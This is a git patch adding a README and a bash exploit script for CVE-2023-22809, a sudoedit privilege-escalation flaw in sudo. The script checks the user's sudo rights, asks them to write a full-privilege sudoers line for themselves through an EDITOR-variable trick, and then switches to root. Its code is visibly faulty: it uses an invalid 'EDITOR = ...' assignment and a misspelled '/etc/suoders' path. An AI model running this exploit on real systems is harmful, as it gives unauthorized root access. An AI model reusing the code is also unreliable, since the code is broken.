From c4d113b155e52b4c14ca4fbcb2c47c82d915bf50 Mon Sep 17 00:00:00 2001
From: Martin Romera Sobrado <mromera99@n3m1sys.com>
Date: Sat, 21 Jan 2023 16:22:20 +0100
Subject: [PATCH] Initial Commit

Initial Commit
---
 README.md  | 13 +++++++++++++
 exploit.sh | 31 +++++++++++++++++++++++++++++++
 2 files changed, 44 insertions(+)
 create mode 100644 README.md
 create mode 100644 exploit.sh

diff --git a/README.md b/README.md
new file mode 100644
index 0000000..db4ead3
--- /dev/null
+++ b/README.md
@@ -0,0 +1,13 @@
+# CVE-2023-22809
+
+## sudo Privilege escalation
+
+Affected sudo versions: 1.8.0 to 1.9.12p1 
+
+This script automates the exploitation of the CVE-2023-22809 vulnerability to 
+gain a root shell. 
+
+The script checks if the current user has access to run the `sudoedit` or 
+`sudo -e` command for some file with root privileges. If it does it opens the 
+sudoers file for the attacker to introduce the privilege escalation policy 
+for the current user and get a root shell.
diff --git a/exploit.sh b/exploit.sh
new file mode 100644
index 0000000..1f6a8eb
--- /dev/null
+++ b/exploit.sh
@@ -0,0 +1,31 @@
+#!/usr/bin/env bash
+#
+# sudo 1.8.0 - 1.9.12p1 - Privilege Escalation
+#
+# Exploit Author: n3m1.sys
+# CVE: CVE-2023-22809
+# Vendor Homepage: https://www.sudo.ws/
+# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz
+# Version: 1.8.0 to 1.9.12p1
+# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9
+#
+# Running this exploit on a vulnerable system allows a localiattacker to gain 
+# a root shell on the machine.
+#
+# The exploit checks if the current user has privileges to run sudoedit or 
+# sudo -e on a file as root. If so it will open the sudoers file for the
+# attacker to add a line to gain privileges on all the files and get a root 
+# shell.
+
+EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E "(root)" | cut -d ' ' -f 6-)
+
+if [ -z "$EXPLOITABLE" ]; then
+    echo "> This user can't run sudoedit as root"
+else
+    echo "> BINGO! User exploitable"
+    echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
+    echo "$USER ALL=(ALL:ALL) ALL"
+    read -n 1 -s -r -p "Press any key to continue..."
+    EDITOR = "vim -- /etc/suoders" $EXPLOITABLE
+    sudo su root
+fi